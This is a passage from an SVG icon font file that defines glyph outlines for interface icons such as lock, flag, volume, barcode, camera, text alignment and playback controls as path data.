d="M440.935 435.426c-0.327148 6.8457 5.13477 12.5742 11.9873 12.5742h47.4111c6.62695 0 12 -5.37305 12 -12v-200.333c0 -6.62695 -5.37305 -12 -12 -12h-200.333c-6.62695 0 -12 5.37305 -12 12v47.4111c0 6.85254 5.72852 12.3135 12.5742 11.9863l101.529 -4.86523
c-31.5918 46.9443 -85.2109 77.8008 -146.104 77.8008c-83.0693 0 -152.593 -57.4082 -171.137 -134.741c-1.29883 -5.41699 -6.10645 -9.25879 -11.6768 -9.25879h-49.084c-7.49902 0 -13.1943 6.80664 -11.8066 14.1758c21.6367 114.9 122.518 201.824 243.704 201.824
c75.6738 0 143.416 -33.9043 188.901 -87.3398zM256 16c83.0693 0 152.593 57.4082 171.137 134.741c1.29883 5.41699 6.10645 9.25879 11.6768 9.25879h49.084c7.49902 0 13.1943 -6.80664 11.8066 -14.1758c-21.6367 -114.9 -122.518 -201.824 -243.704 -201.824
c-75.5947 0 -143.275 33.834 -188.759 87.1738l4.12891 -82.5752c0.342773 -6.85352 -5.12207 -12.5986 -11.9854 -12.5986h-47.3848c-6.62695 0 -12 5.37305 -12 12v200.332c0 6.62695 5.37305 12 12 12h200.332c6.62695 0 12 -5.37305 12 -12v-47.4121
c0 -6.85156 -5.72852 -12.3125 -12.5732 -11.9863l-101.868 4.87109c31.5928 -46.9463 85.2148 -77.8047 146.109 -77.8047z" />
    <glyph glyph-name="list-alt" unicode="&#xf022;" 
d="M464 -32h-416c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h416c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48zM128 328c-22.0908 0 -40 -17.9092 -40 -40s17.9092 -40 40 -40s40 17.9092 40 40s-17.9092 40 -40 40zM128 232
c-22.0908 0 -40 -17.9092 -40 -40s17.9092 -40 40 -40s40 17.9092 40 40s-17.9092 40 -40 40zM128 136c-22.0908 0 -40 -17.9092 -40 -40s17.9092 -40 40 -40s40 17.9092 40 40s-17.9092 40 -40 40zM416 272v32c0 6.62695 -5.37305 12 -12 12h-200
c-6.62695 0 -12 -5.37305 -12 -12v-32c0 -6.62695 5.37305 -12 12 -12h200c6.62695 0 12 5.37305 12 12zM416 176v32c0 6.62695 -5.37305 12 -12 12h-200c-6.62695 0 -12 -5.37305 -12 -12v-32c0 -6.62695 5.37305 -12 12 -12h200c6.62695 0 12 5.37305 12 12zM416 80v32
c0 6.62695 -5.37305 12 -12 12h-200c-6.62695 0 -12 -5.37305 -12 -12v-32c0 -6.62695 5.37305 -12 12 -12h200c6.62695 0 12 5.37305 12 12z" />
    <glyph glyph-name="lock" unicode="&#xf023;" horiz-adv-x="448" 
d="M400 224c26.5 0 48 -21.5 48 -48v-192c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v192c0 26.5 21.5 48 48 48h24v72c0 83.7998 68.2002 152 152 152s152 -68.2002 152 -152v-72h24zM296 224v72c0 39.7002 -32.2998 72 -72 72s-72 -32.2998 -72 -72v-72h144
z" />
    <glyph glyph-name="flag" unicode="&#xf024;" horiz-adv-x="520" 
d="M349.565 349.217c40.4951 0 82.6113 15.9062 116.949 31.8545c21.2168 9.85352 45.4854 -5.62305 45.4854 -29.0166v-243.1c0 -10.5264 -5.16016 -20.4072 -13.8428 -26.3584c-35.8379 -24.5635 -74.3359 -40.8574 -122.505 -40.8574
c-67.373 0 -111.629 34.7832 -165.218 34.7832c-50.8525 0 -86.124 -10.0586 -114.435 -22.1221v-94.4004c0 -13.2549 -10.7451 -24 -24 -24h-16c-13.2549 0 -24 10.7451 -24 24v386.055c-14.5029 10.1201 -24 26.9189 -24 45.9453
c0 31.7041 26.3447 57.2539 58.3379 55.9521c28.4678 -1.1582 51.7793 -23.9668 53.5508 -52.4033c0.0625 -0.980469 0.113281 -2.57324 0.113281 -3.55566c0 -5.71094 -1.65723 -14.6738 -3.69922 -20.0059c20.7363 7.62891 43.0898 12.0127 68.0449 12.0127
c67.373 0 111.63 -34.7832 165.218 -34.7832z" />
    <glyph glyph-name="headphones" unicode="&#xf025;" 
d="M256 416c141.504 0 256 -114.521 256 -256v-48c0 -10.917 -7.9248 -23.7402 -17.6904 -28.6221l-14.3818 -7.19141c-2.01074 -60.0889 -51.3486 -108.187 -111.928 -108.187h-24c-13.2549 0 -24 10.7451 -24 24v176c0 13.2549 10.7451 24 24 24h24
c31.3418 0 59.6709 -12.8789 80 -33.627v1.62695c0 105.869 -86.1309 192 -192 192s-192 -86.1309 -192 -192v-1.62695c20.3291 20.748 48.6582 33.627 80 33.627h24c13.2549 0 24 -10.7451 24 -24v-176c0 -13.2549 -10.7451 -24 -24 -24h-24
c-60.5791 0 -109.917 48.0967 -111.928 108.187l-14.3828 7.19141c-9.76465 4.88184 -17.6895 17.7051 -17.6895 28.6221v0v48c0 141.504 114.52 256 256 256z" />
    <glyph glyph-name="volume-off" unicode="&#xf026;" horiz-adv-x="258" 
d="M216.36 376.96c15.0098 15 40.9697 4.49023 40.9697 -16.9795v-335.961c0 -21.4395 -25.9404 -32 -40.9697 -16.9697l-88.9707 88.9502h-102.06c-13.2598 0 -24 10.75 -24 24v144c0 13.2598 10.7402 24 24 24h102.06z" />
    <glyph glyph-name="volume-down" unicode="&#xf027;" horiz-adv-x="384" 
d="M215.03 375.96c15.0098 15 40.9697 4.49023 40.9697 -16.9795v-335.961c0 -21.4395 -25.9404 -32 -40.9697 -16.9697l-88.9707 88.9502h-102.06c-13.2598 0 -24 10.75 -24 24v144c0 13.2598 10.7402 24 24 24h102.06zM338.23 267.88
c28.2393 -15.5498 45.7793 -44.9902 45.7793 -76.8701s-17.54 -61.3301 -45.7695 -76.8799c-11.5605 -6.34961 -26.1807 -2.20996 -32.6104 9.4502c-6.38965 11.6104 -2.16016 26.2002 9.4502 32.6104c12.9004 7.08984 20.9199 20.4297 20.9199 34.8096
s-8.01953 27.7197 -20.9297 34.8203c-11.6104 6.41016 -15.8398 21 -9.4502 32.6094c6.41992 11.6104 21.0303 15.7803 32.6104 9.4502z" />
    <glyph glyph-name="volume-up" unicode="&#xf028;" horiz-adv-x="576" 
d="M215.03 376.95c15.0098 15.0098 40.9697 4.49023 40.9697 -16.9697v-335.961c0 -21.4395 -25.9404 -32 -40.9697 -16.9697l-88.9707 88.9502h-102.06c-13.2598 0 -24 10.75 -24 24v144c0 13.2598 10.7402 24 24 24h102.06zM448.35 428.03
c79.9199 -52.46 127.65 -140.7 127.65 -236.03s-47.7305 -183.58 -127.65 -236.04c-11.5801 -7.61035 -26.4697 -3.75977 -33.5098 6.9502c-7.33984 11.1602 -4.21973 26.1797 6.9502 33.5c66.2695 43.4902 105.82 116.6 105.82 195.58
c0 78.9795 -39.5508 152.09 -105.82 195.58c-11.1699 7.33008 -14.29 22.3398 -6.9502 33.5098c7.33008 11.1895 22.3398 14.2803 33.5098 6.9502zM480 192c0 -63.54 -32.0596 -121.94 -85.7695 -156.24c-12 -7.67969 -26.6104 -2.89941 -33.1201 7.45996
c-7.09082 11.29 -3.78027 26.2207 7.40918 33.3604c39.75 25.3896 63.4805 68.5303 63.4805 115.42s-23.7305 90.0303 -63.4805 115.42c-11.1895 7.15039 -14.5 22.0801 -7.40918 33.3604c7.08984 11.2793 21.9297 14.5996 33.1201 7.45996
c53.71 -34.2998 85.7695 -92.71 85.7695 -156.24zM338.23 268.87c28.2393 -15.54 45.7793 -44.9805 45.7793 -76.8604s-17.54 -61.3301 -45.7695 -76.8799c-11.5605 -6.34961 -26.1807 -2.20996 -32.6104 9.4502c-6.38965 11.6104 -2.16016 26.2002 9.4502 32.6104
c12.9004 7.08984 20.9199 20.4297 20.9199 34.8096c0 14.3701 -8.01953 27.7197 -20.9297 34.8096c-11.6104 6.41016 -15.8398 21 -9.4502 32.6104c6.41992 11.6104 21.0303 15.7803 32.6104 9.4502z" />
    <glyph glyph-name="qrcode" unicode="&#xf029;" horiz-adv-x="448" 
d="M0 224v192h192v-192h-192zM64 352v-64h64v64h-64zM256 416h192v-192h-192v192zM384 288v64h-64v-64h64zM0 -32v192h192v-192h-192zM64 96v-64h64v64h-64zM416 160h32v-128h-96v32h-32v-96h-64v192h96v-32h64v32zM416 0h32v-32h-32v32zM352 0h32v-32h-32v32z" />
    <glyph glyph-name="barcode" unicode="&#xf02a;" 
d="M0 0v384h18v-384h-18zM26.8574 0.273438v383.727h9.14258v-383.727h-9.14258zM54 0.273438v383.727h8.85742v-383.727h-8.85742zM98.8574 0.273438v383.727h8.85645v-383.727h-8.85645zM134.857 0.273438v383.727h17.7139v-383.727h-17.7139zM179.714 0.273438v383.727
h8.85742v-383.727h-8.85742zM197.714 0.273438v383.727h8.85742v-383.727h-8.85742zM215.714 0.273438v383.727h8.85742v-383.727h-8.85742zM251.429 0.273438v383.727h18v-383.727h-18zM296.286 0.273438v383.727h18v-383.727h-18zM332.285 0.273438v383.727h18.001
v-383.727h-18.001zM368.286 0.273438v383.727h18.001v-383.727h-18.001zM395.143 0.273438v383.727h18v-383.727h-18zM440.286 0.273438v383.727h26.8564v-383.727h-26.8564zM476 0.273438v383.727h9.14258v-383.727h-9.14258zM494 0v384h18v-384h-18z" />
    <glyph glyph-name="tag" unicode="&#xf02b;" horiz-adv-x="511" 
d="M0 195.882v204.118c0 26.5098 21.4902 48 48 48h204.118c10.9746 0 26.1807 -6.29883 33.9404 -14.0586l211.883 -211.883c18.7441 -18.7441 18.7441 -49.1367 0 -67.8818l-204.118 -204.118c-18.7451 -18.7441 -49.1377 -18.7441 -67.8818 0l-211.883 211.883
c-7.75977 7.75977 -14.0586 22.9658 -14.0586 33.9404zM112 384c-26.5098 0 -48 -21.4902 -48 -48s21.4902 -48 48 -48s48 21.4902 48 48s-21.4902 48 -48 48z" />
    <glyph glyph-name="tags" unicode="&#xf02c;" horiz-adv-x="639" 
d="M497.941 222.059c18.7441 -18.7441 18.7441 -49.1367 0 -67.8818l-204.118 -204.118c-18.7461 -18.7451 -49.1387 -18.7441 -67.8818 0l-211.883 211.883c-7.75977 7.75977 -14.0586 22.9658 -14.0586 33.9404v204.118c0 26.5098 21.4902 48 48 48h204.118
c10.9746 0 26.1807 -6.29883 33.9404 -14.0586zM112 288c26.5098 0 48 21.4902 48 48s-21.4902 48 -48 48s-48 -21.4902 -48 -48s21.4902 -48 48 -48zM625.941 154.177l-204.118 -204.118c-18.7451 -18.7441 -49.1377 -18.7441 -67.8818 0l-0.360352 0.360352
l174.059 174.059c16.999 16.999 26.3604 39.6006 26.3604 63.6406s-9.3623 46.6406 -26.3604 63.6396l-196.242 196.242h48.7207c10.9746 0 26.1807 -6.29883 33.9404 -14.0586l211.883 -211.883c18.7441 -18.7441 18.7441 -49.1367 0 -67.8818z" />
    <glyph glyph-name="book" unicode="&#xf02d;" horiz-adv-x="448" 
d="M448 88c0 -7.5 -3.5 -14.2998 -8.90039 -18.5996c-4.19922 -15.4004 -4.19922 -59.3008 0 -74.7002c5.40039 -4.40039 8.90039 -11.2002 8.90039 -18.7002v-16c0 -13.2998 -10.7002 -24 -24 -24h-328c-53 0 -96 43 -96 96v320c0 53 43 96 96 96h328
c13.2998 0 24 -10.7002 24 -24v-336zM128 314v-20c0 -3.2998 2.7002 -6 6 -6h212c3.2998 0 6 2.7002 6 6v20c0 3.2998 -2.7002 6 -6 6h-212c-3.2998 0 -6 -2.7002 -6 -6zM128 250v-20c0 -3.2998 2.7002 -6 6 -6h212c3.2998 0 6 2.7002 6 6v20c0 3.2998 -2.7002 6 -6 6h-212
c-3.2998 0 -6 -2.7002 -6 -6zM381.4 0c-1.90039 17.0996 -1.90039 46.9004 0 64h-285.4c-17.5996 0 -32 -14.4004 -32 -32c0 -17.7002 14.2998 -32 32 -32h285.4z" />
    <glyph glyph-name="bookmark" unicode="&#xf02e;" horiz-adv-x="384" 
d="M0 -64v464c0 26.5098 21.4902 48 48 48h288c26.5098 0 48 -21.4902 48 -48v-464l-192 112z" />
    <glyph glyph-name="print" unicode="&#xf02f;" 
d="M448 256c35.3496 0 64 -28.6504 64 -64v-112c0 -8.83984 -7.16016 -16 -16 -16h-48v-96c0 -17.6699 -14.3301 -32 -32 -32h-320c-17.6699 0 -32 14.3301 -32 32v96h-48c-8.83984 0 -16 7.16016 -16 16v112c0 35.3496 28.6504 64 64 64v160c0 17.6699 14.3301 32 32 32
h274.74c8.49023 0 16.6299 -3.37012 22.6299 -9.37012l45.2598 -45.25c6 -6.00977 9.37012 -14.1396 9.37012 -22.6299v-114.75zM384 0v96h-256v-96h256zM384 224v96h-48c-8.83984 0 -16 7.16016 -16 16v48h-192v-160h256zM432 152c13.25 0 24 10.75 24 24
c0 13.2598 -10.75 24 -24 24s-24 -10.7402 -24 -24c0 -13.25 10.75 -24 24 -24z" />
    <glyph glyph-name="camera" unicode="&#xf030;" 
d="M512 304v-288c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v288c0 26.5 21.5 48 48 48h88l12.2998 32.9004c7 18.6992 24.9004 31.0996 44.9004 31.0996h125.5c20 0 37.8994 -12.4004 44.8994 -31.0996l12.4004 -32.9004h88c26.5 0 48 -21.5 48 -48zM376 160
c0 66.2002 -53.7998 120 -120 120s-120 -53.7998 -120 -120s53.7998 -120 120 -120s120 53.7998 120 120zM344 160c0 -48.5 -39.5 -88 -88 -88s-88 39.5 -88 88s39.5 88 88 88s88 -39.5 88 -88z" />
    <glyph glyph-name="font" unicode="&#xf031;" horiz-adv-x="448" 
d="M432 32c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-136c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h23.4004l-26.6006 80.7998h-138.2l-26.5996 -80.7998h24c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-136
c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h26.7002l129.8 373.3c2.2002 6.40039 8.2998 10.7002 15.0996 10.7002h72.8008c6.7998 0 12.8994 -4.2998 15.0996 -10.7002l129.8 -373.3h26.7002zM174.4 179.7h98.5996l-41.2998 124
c-4.7998 15.2002 -6.90039 28.2002 -7.7002 34.7002c-1 -6.40039 -3.2998 -19.4004 -7.59961 -34.6006z" />
    <glyph glyph-name="bold" unicode="&#xf032;" horiz-adv-x="384" 
d="M304.793 204.109c44.6338 -14.4395 71.207 -53.9551 71.207 -106.123c0 -60.6338 -38.4805 -107.18 -89.4443 -122.402c-22.0312 -6.29492 -42.6631 -7.58398 -66.8652 -7.58398h-195.69c-8.83691 0 -16 7.16309 -16 16v32.4209c0 8.83691 7.16309 16 16 16h33.1133
v318.53h-33.1133c-8.83691 0 -16 7.16309 -16 16v33.0488c0 8.83691 7.16309 16 16 16h185.661c31.1875 0 55.4766 -2.00977 80.1631 -12.0186c42.376 -16.5537 68.626 -55.9434 68.626 -104.18c0 -41.5332 -20.0186 -77.1553 -53.6572 -95.6924zM142.217 347.191v-112.953
h76.8467c32.709 0 53.0283 21.7607 53.0283 56.79c0 22.9434 -9.07812 40.9668 -24.9062 49.4453c-9.98828 4.69824 -21.2305 6.71777 -37.5244 6.71777h-67.4443zM254.859 41.7158c21.1221 8.80078 34.7822 32.8594 34.7812 61.2842
c0 37.6768 -23.4121 63.0566 -63.0566 63.0566h-84.3672v-129.248h81.2334c8.73145 0 21.2686 0.851562 31.4092 4.90723z" />
    <glyph glyph-name="italic" unicode="&#xf033;" horiz-adv-x="320" 
d="M204.758 32c10.0664 0 17.6309 -9.18457 15.7041 -19.0654l-6.24512 -32c-1.39355 -7.13965 -8.42871 -12.9346 -15.7031 -12.9346h-0.000976562h-158.479c-10.0674 0 -17.6318 9.18457 -15.7051 19.0654l6.24512 32c1.39355 7.13965 8.42871 12.9346 15.7031 12.9346
h0.000976562h39.4707l62.0898 320h-33.8457c-10.0664 0 -17.6309 9.18359 -15.7041 19.0635l6.24219 32c1.39258 7.14062 8.42773 12.9365 15.7041 12.9365h159.732c10.0664 0 17.6309 -9.18359 15.7041 -19.0635l-6.24219 -32
c-1.39258 -7.14062 -8.42773 -12.9365 -15.7041 -12.9365h-40.7246l-62.0918 -320h33.8486z" />
    <glyph glyph-name="text-height" unicode="&#xf034;" horiz-adv-x="576" 
d="M16 416h288c8.83691 0 16 -7.16309 16 -16v-96c0 -8.83691 -7.16309 -16 -16 -16h-35.4961c-8.83691 0 -16 7.16309 -16 16v48h-54.7607v-320h34.2568c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-144c-8.83691 0 -16 7.16309 -16 16v32
c0 8.83691 7.16309 16 16 16h34.2568v320h-54.7607v-48c0 -8.83691 -7.16309 -16 -16 -16h-35.4961c-8.83691 0 -16 7.16309 -16 16v96c0 8.83691 7.16309 16 16 16zM491.308 411.315l79.9951 -80.001c10.0059 -10.0078 2.99414 -27.3145 -11.3125 -27.3145h-47.9902v-224
h48c15.6387 0 20.6348 -17.9912 11.3135 -27.3145l-79.9951 -80.001c-6.24707 -6.24609 -16.3818 -6.24414 -22.626 0l-79.9951 80.001c-10.0059 10.0078 -2.99414 27.3145 11.3125 27.3145h47.9902v224h-48c-15.6387 0 -20.6348 17.9912 -11.3135 27.3145l79.9951 80.001
c6.24707 6.24805 16.3818 6.24414 22.626 0z" />
    <glyph glyph-name="text-width" unicode="&#xf035;" horiz-adv-x="448" 
d="M16 416h416c8.83691 0 16 -7.16309 16 -16v-96c0 -8.83691 -7.16309 -16 -16 -16h-35.4961c-8.83691 0 -16 7.16309 -16 16v48h-118.761v-128h34.2568c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-144c-8.83691 0 -16 7.16309 -16 16v32
c0 8.83691 7.16309 16 16 16h34.2568v128h-118.761v-48c0 -8.83691 -7.16309 -16 -16 -16h-35.4961c-8.83691 0 -16 7.16309 -16 16v96c0 8.83691 7.16309 16 16 16zM443.315 75.3184c6.24805 -6.24707 6.24414 -16.3818 0 -22.626l-80.001 -79.9951
c-10.0078 -10.0059 -27.3145 -2.99414 -27.3145 11.3125v47.9902h-224v-48c0 -15.6377 -17.9912 -20.6348 -27.3145 -11.3135l-80.001 79.9951c-6.24609 6.24707 -6.24414 16.3818 0 22.626l80.001 79.9951c10.0078 10.0059 27.3145 2.99414 27.3145 -11.3125v-47.9902h224
v48c0 15.6377 17.9912 20.6348 27.3145 11.3135z" />
    <glyph glyph-name="align-left" unicode="&#xf036;" horiz-adv-x="448" 
d="M288 404v-40c0 -8.83691 -7.16309 -16 -16 -16h-256c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h256c8.83691 0 16 -7.16309 16 -16zM0 276c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416
c-8.83691 0 -16 7.16309 -16 16v40zM16 -36c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416zM272 164c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-256
c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h256z" />
    <glyph glyph-name="align-center" unicode="&#xf037;" horiz-adv-x="448" 
d="M352 404v-40c0 -8.83691 -7.16309 -16 -16 -16h-224c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h224c8.83691 0 16 -7.16309 16 -16zM16 220c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40
c0 -8.83691 -7.16309 -16 -16 -16h-416zM16 -36c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416zM336 164c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16
h-224c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h224z" />
    <glyph glyph-name="align-right" unicode="&#xf038;" horiz-adv-x="448" 
d="M160 364v40c0 8.83691 7.16309 16 16 16h256c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-256c-8.83691 0 -16 7.16309 -16 16zM16 220c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40
c0 -8.83691 -7.16309 -16 -16 -16h-416zM16 -36c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416zM176 92c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h256
c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-256z" />
    <glyph glyph-name="align-justify" unicode="&#xf039;" horiz-adv-x="448" 
d="M0 364v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416c-8.83691 0 -16 7.16309 -16 16zM16 220c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40
c0 -8.83691 -7.16309 -16 -16 -16h-416zM16 -36c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416zM16 92c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416
c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416z" />
    <glyph glyph-name="list" unicode="&#xf03a;" 
d="M128 332v40c0 8.83691 7.16309 16 16 16h352c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-352c-8.83691 0 -16 7.16309 -16 16zM144 156c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h352c8.83691 0 16 -7.16309 16 -16v-40
c0 -8.83691 -7.16309 -16 -16 -16h-352zM144 -4c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h352c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-352zM16 304c-8.83691 0 -16 7.16309 -16 16v64c0 8.83691 7.16309 16 16 16h64
c8.83691 0 16 -7.16309 16 -16v-64c0 -8.83691 -7.16309 -16 -16 -16h-64zM16 144c-8.83691 0 -16 7.16309 -16 16v64c0 8.83691 7.16309 16 16 16h64c8.83691 0 16 -7.16309 16 -16v-64c0 -8.83691 -7.16309 -16 -16 -16h-64zM16 -16c-8.83691 0 -16 7.16309 -16 16v64
c0 8.83691 7.16309 16 16 16h64c8.83691 0 16 -7.16309 16 -16v-64c0 -8.83691 -7.16309 -16 -16 -16h-64z" />
    <glyph glyph-name="outdent" unicode="&#xf03b;" horiz-adv-x="448" 
d="M0 364v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416c-8.83691 0 -16 7.16309 -16 16zM208 220c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h224c8.83691 0 16 -7.16309 16 -16v-40
c0 -8.83691 -7.16309 -16 -16 -16h-224zM16 -36c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416zM208 92c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h224
c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-224zM4.68652 180.687c-6.24805 6.24805 -6.24805 16.3789 0 22.627l96 95.9912c9.98828 9.99121 27.3135 3.0166 27.3135 -11.3125v-191.977c0 -14.2393 -17.2656 -21.3633 -27.3135 -11.3125z" />
    <glyph glyph-name="indent" unicode="&#xf03c;" horiz-adv-x="448" 
d="M0 364v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416c-8.83691 0 -16 7.16309 -16 16zM176 220c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h256c8.83691 0 16 -7.16309 16 -16v-40
c0 -8.83691 -7.16309 -16 -16 -16h-256zM16 -36c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416zM176 92c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h256
c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-256zM123.313 203.313c6.24805 -6.24805 6.24805 -16.3789 0 -22.625l-96 -95.9922c-9.98828 -9.99121 -27.3135 -3.0166 -27.3135 11.3125v191.976c0 14.2393 17.2656 21.3633 27.3135 11.3125z" />
    <glyph glyph-name="video" unicode="&#xf03d;" horiz-adv-x="576" 
d="M336.2 384c26.3994 0 47.7998 -21.4004 47.7998 -47.7998v-288.4c0 -26.3994 -21.4004 -47.7998 -47.7998 -47.7998h-288.4c-26.3994 0 -47.7998 21.4004 -47.7998 47.7998v288.4c0 26.3994 21.4004 47.7998 47.7998 47.7998h288.4zM525.6 346.3
c21.3008 14.6006 50.4004 -0.399414 50.4004 -25.7998v-256.9c0 -25.5 -29.2002 -40.3994 -50.4004 -25.7998l-109.6 75.5v157.4z" />
    <glyph glyph-name="image" unicode="&#xf03e;" 
d="M464 0h-416c-26.5098 0 -48 21.4902 -48 48v288c0 26.5098 21.4902 48 48 48h416c26.5098 0 48 -21.4902 48 -48v-288c0 -26.5098 -21.4902 -48 -48 -48zM112 328c-30.9277 0 -56 -25.0723 -56 -56s25.0723 -56 56 -56s56 25.0723 56 56s-25.0723 56 -56 56zM64 64h384
v112l-87.5146 87.5146c-4.68652 4.68652 -12.2842 4.68652 -16.9717 0l-135.514 -135.515l-55.5146 55.5146c-4.68652 4.68652 -12.2842 4.68652 -16.9717 0l-71.5137 -71.5146v-48z" />
    <glyph glyph-name="map-marker" unicode="&#xf041;" horiz-adv-x="384" 
d="M172.268 -53.6699c-145.298 210.639 -172.268 232.257 -172.268 309.67c0 106.039 85.9609 192 192 192s192 -85.9609 192 -192c0 -77.4131 -26.9697 -99.0312 -172.268 -309.67c-9.53516 -13.7744 -29.9307 -13.7734 -39.4648 0z" />
    <glyph glyph-name="adjust" unicode="&#xf042;" 
d="M8 192c0 136.967 111.034 248 248 248s248 -111.034 248 -248s-111.033 -248 -248 -248s-248 111.034 -248 248zM256 8c101.689 0 184 82.2949 184 184c0 101.689 -82.2949 184 -184 184v-368z" />
    <glyph glyph-name="tint" unicode="&#xf043;" horiz-adv-x="352" 
d="M205.22 425.91c46.9902 -158.48 146.78 -200.07 146.78 -311.82c0 -98.4395 -78.7197 -178.09 -176 -178.09s-176 79.6504 -176 178.09c0 111.19 100.01 154.061 146.78 311.82c9 30.1201 50.5 28.7803 58.4395 0zM176 0c8.83984 0 16 7.16016 16 16s-7.16016 16 -16 16
c-44.1104 0 -80 35.8896 -80 80c0 8.83984 -7.16016 16 -16 16s-16 -7.16016 -16 -16c0 -61.75 50.25 -112 112 -112z" />
    <glyph glyph-name="edit" unicode="&#xf044;" horiz-adv-x="575" 
d="M402.6 364.8l90.2002 -90.2002c3.7998 -3.7998 3.7998 -10 0 -13.7998l-218.399 -218.399l-92.8008 -10.3008c-12.3994 -1.39941 -22.8994 9.10059 -21.5 21.5l10.3008 92.8008l218.399 218.399c3.7998 3.7998 10 3.7998 13.7998 0zM564.6 387.7
c15.2002 -15.2002 15.2002 -39.9004 0 -55.2002l-35.3994 -35.4004c-3.7998 -3.7998 -10 -3.7998 -13.7998 0l-90.2002 90.2002c-3.7998 3.7998 -3.7998 10 0 13.7998l35.3994 35.4004c15.3008 15.2002 40 15.2002 55.2002 0zM384 101.8c0 3.2002 1.2998 6.2002 3.5 8.5
l40 40c7.59961 7.5 20.5 2.2002 20.5 -8.5v-157.8c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h285.8c10.7002 0 16.1006 -12.9004 8.5 -20.5l-40 -40c-2.2998 -2.2002 -5.2998 -3.5 -8.5 -3.5h-229.8v-320h320v101.8z" />
    <glyph glyph-name="step-backward" unicode="&#xf048;" horiz-adv-x="448" 
d="M64 -20v424c0 6.59961 5.40039 12 12 12h48c6.59961 0 12 -5.40039 12 -12v-176.4l195.5 181c20.5996 17.1006 52.5 2.80078 52.5 -24.5996v-384c0 -27.4004 -31.9004 -41.7002 -52.5 -24.5996l-195.5 179.899v-175.3c0 -6.59961 -5.40039 -12 -12 -12h-48
c-6.59961 0 -12 5.40039 -12 12z" />
    <glyph glyph-name="fast-backward" unicode="&#xf049;" 
d="M0 12v360c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-151.9l171.5 156.5c20.5996 17.1006 52.5 2.80078 52.5 -24.5996v-131.9l171.5 156.5c20.5996 17.1006 52.5 2.80078 52.5 -24.5996v-320c0 -27.4004 -31.9004 -41.7002 -52.5 -24.5996
